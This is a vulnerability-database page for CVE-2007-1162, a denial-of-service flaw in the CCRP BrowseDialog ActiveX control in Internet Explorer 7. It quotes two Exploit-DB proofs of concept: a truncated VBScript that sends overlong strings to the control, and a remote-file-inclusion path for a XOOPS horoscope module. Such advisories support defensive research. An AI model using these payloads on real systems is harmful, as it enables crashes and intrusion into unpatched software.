CVE-2007-1162
published 2007-03-02CVE-2007-1162: A certain ActiveX control in the Common Controls Replacement Project (CCRP) CCRP BrowseDialog Server (ccrpbds6.dll) allows remote attackers to cause a denial…
PriorityP429high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
3.06%
86.0th percentile
A certain ActiveX control in the Common Controls Replacement Project (CCRP) CCRP BrowseDialog Server (ccrpbds6.dll) allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) IsFolderAvailable or (2) RootFolder property value, different vectors than CVE-2007-0371.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS Module horoscope 2.0 - Remote File Inclusion
exploitdb·2007-06-12
CVE-2007-3236 XOOPS Module horoscope 2.0 - Remote File Inclusion
XOOPS Module horoscope 2.0 - Remote File Inclusion
---
BeyazKurt - [email protected]
XOOPS Modules Horoscope
http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
modules/horoscope/footer.php?xoopsConfig[root_path]=
{NetLife Since : '2003-4'}
Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
# milw0rm.com [2007-06-12]
Exploit-DB
BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities
exploitdb·2007-02-21
CVE-2007-1162 BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities
BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities
---
BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Soundtrack: "Zeta Reticoli" (Meganoidi)
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
I found other two methods in this dll that are unable to handle long string.
It seems to be a Stack Overflow, but I'm not sure of this :)
IsFolderAvailable
RootFolder
Quoting...
Sub tryMe
on error resume next
if Pucca.value="IsFolderAvailable" then
argCount = 1
arg1=String(1000000, "A")
BrowseDialog.IsFolderAvailable arg1
BrowseDialog.IsFolderAvailable arg1
elseif Pucca.value="RootFolder" then
argCount = 1
arg1=String(1000000, "A")
Br
No writeups or analysis indexed.
http://osvdb.org/34963http://www.securityfocus.com/bid/22645http://www.securityfocus.com/data/vulnerabilities/exploits/22645.htmlhttps://www.exploit-db.com/exploits/3350http://osvdb.org/34963http://www.securityfocus.com/bid/22645http://www.securityfocus.com/data/vulnerabilities/exploits/22645.htmlhttps://www.exploit-db.com/exploits/3350
2007-03-02
Published